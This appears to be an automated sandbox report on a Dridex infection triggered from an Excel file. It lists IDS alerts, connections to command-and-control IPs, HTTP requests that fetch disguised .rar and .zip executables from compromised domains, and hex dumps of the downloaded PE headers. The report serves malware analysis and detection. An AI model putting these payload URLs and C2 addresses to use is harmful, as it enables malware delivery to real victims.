Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49302
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49301
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49303
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49303
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49304
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49305
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49309
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49310
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49313
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49313
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49314
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49314
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49311
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49315
Source: Traffic Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49315
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 69.164.207.140:3388
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 198.57.200.100:3786
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Jan 2021 15:13:16 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Tue, 12 Jan 2021 11:40:23 GMTAccept-Ranges: bytesContent-Length: 765440Keep-Alive: timeout=5, max=75Content-Type: application/x-rar-compressedData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 35 51 21 75 54 3f 72 75 54 3f 72 75 54 3f 72 a8 ab f1 72 74 54 3f 72 78 06 e2 72 77 54 3f 72 78 06 e0 72 74 54 3f 72 78 06 df 72 7a 54 3f 72 78 06 de 72 77 54 3f 72 a8 ab f4 72 76 54 3f 72 75 54 3e 72 3c 54 3f 72 78 06 e3 72 74 54 3f 72 78 06 da 72 7a 54 3f 72 78 06 e4 72 74 54 3f 72 78 06 e1 72 74 54 3f 72 52 69 63 68 75 54 3f 72 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 15 df dc 52 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0c 00 00 64 0b 00 00 16 01 00 00 00 00 00 98 6f 0a 00 00 10 00 00 00 80 0b 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 0c 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 72 0b 00 4d 00 00 00 5c 71 0c 00 3c 00 00 00 00 80 0c 00 10 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 0c 00 e8 1a 00 00 60 10 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 f4 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 0c 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ad 62 0b 00 00 10 00 00 00 64 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 e8 00 00 00 80 0b 00 00 1a 00 00 00 68 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 20 09 00 00 00 70 0c 00 00 0a 00 00 00 82 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 10 05 00 00 00 80 0c 00 00 06 00 00 00 8c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e8 1a 00 00 00 90 0c 00 00 1c 00 00 00 92 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Jan 2021 15:13:25 GMTServer: ApacheLast-Modified: Mon, 11 Jan 2021 21:14:58 GMTAccept-Ranges: bytesContent-Length: 765440Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/zipData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 35 51 21 75 54 3f 72 75 54 3f 72 75 54 3f 72 a8 ab f1 72 74 54 3f 72 78 06 e2 72 77 54 3f 72 78 06 e0 72 74 54 3f 72 78 06 df 72 7a 54 3f 72 78 06 de 72 77 54 3f 72 a8 ab f4 72 76 54 3f 72 75 54 3e 72 3c 54 3f 72 78 06 e3 72 74 54 3f 72 78 06 da 72 7a 54 3f 72 78 06 e4 72 74 54 3f 72 78 06 e1 72 74 54 3f 72 52 69 63 68 75 54 3f 72 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 15 df dc 52 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0c 00 00 64 0b 00 00 16 01 00 00 00 00 00 98 6f 0a 00 00 10 00 00 00 80 0b 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 0c 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 72 0b 00 4d 00 00 00 5c 71 0c 00 3c 00 00 00 00 80 0c 00 10 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 0c 00 e8 1a 00 00 60 10 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 f4 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 0c 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ad 62 0b 00 00 10 00 00 00 64 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 e8 00 00 00 80 0b 00 00 1a 00 00 00 68 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 20 09 00 00 00 70 0c 00 00 0a 00 00 00 82 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 10 05 00 00 00 80 0c 00 00 06 00 00 00 8c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e8 1a 00 00 00 90 0c 00 00 1c 00 00 00 92 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Jan 2021 15:14:27 GMTServer: ApacheStrict-Transport-Security: max-age=63072000; includeSubdomains;X-Frame-Options: SAMEORIGINLast-Modified: Thu, 14 Jan 2021 04:03:15 GMTAccept-Ranges: bytesContent-Length: 765440Cache-Control: max-age=2592000Expires: Fri, 19 Feb 2021 15:14:27 GMTKeep-Alive: timeout=5, max=50Connection: Keep-AliveContent-Type: application/zipData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 35 51 21 75 54 3f 72 75 54 3f 72 75 54 3f 72 a8 ab f1 72 74 54 3f 72 78 06 e2 72 77 54 3f 72 78 06 e0 72 74 54 3f 72 78 06 df 72 7a 54 3f 72 78 06 de 72 77 54 3f 72 a8 ab f4 72 76 54 3f 72 75 54 3e 72 3c 54 3f 72 78 06 e3 72 74 54 3f 72 78 06 da 72 7a 54 3f 72 78 06 e4 72 74 54 3f 72 78 06 e1 72 74 54 3f 72 52 69 63 68 75 54 3f 72 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 15 df dc 52 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0c 00 00 64 0b 00 00 16 01 00 00 00 00 00 98 6f 0a 00 00 10 00 00 00 80 0b 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 0c 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 72 0b 00 4d 00 00 00 5c 71 0c 00 3c 00 00 00 00 80 0c 00 10 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 0c 00 e8 1a 00 00 60 10 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 f4 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 0c 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ad 62 0b 00 00 10 00 00 00 64 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 e8 00 00 00 80 0b 00 00 1a 00 00 00 68 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 20 09 00 00 00 70 0c 00 00 0a 00 00 00 82 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 10 05 00 00 00 80 0c 00 00 06 00 00 00 8c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e8 1a 00 00 00 90 0c 00 00 1c 00 00 00 92 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 198.57.200.100 198.57.200.100
Source: Joe Sandbox View IP Address: 69.164.207.140 69.164.207.140
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: eb88d0b3e1961a0562f006e5ce2a0b87
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /h79fwesfe.rar HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: monitrade.netConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ys95lm6k.rar HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bafnabrotherskesarwala.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xkpffwn.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: artec.com.trConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ylztwx.rar HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.gastronauts.asiaConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uzssv27.rar HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: laureys.beConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: laureys.beConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /by9zwa7p1.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cms.ivpr.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /d8ms3mljy.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: salaodigitalautomovel.pt.deve.ptConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49179 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49183 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49186 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49187 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49191 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49192 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49199 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49204 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49209 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49212 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49216 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49222 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49225 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49228 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49232 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49238 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49241 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49244 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49246 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49249 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49256 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49257 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49260 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49264 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49270 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49271 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49279 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49283 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49288 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49293 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49294 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49286 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49302 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49305 version: TLS 1.0
Source: unknown HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49309 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown TCP traffic detected without corresponding DNS query: 194.225.58.214
Source: unknown TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown TCP traffic detected without corresponding DNS query: 69.164.207.140
Source: unknown TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: unknown TCP traffic detected without corresponding DNS query: 198.57.200.100
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C7A618C6.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /h79fwesfe.rar HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: monitrade.netConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ys95lm6k.rar HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bafnabrotherskesarwala.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xkpffwn.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: artec.com.trConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ylztwx.rar HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.gastronauts.asiaConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uzssv27.rar HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: laureys.beConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: laureys.beConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /by9zwa7p1.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cms.ivpr.orgConnection: Keep-Alive
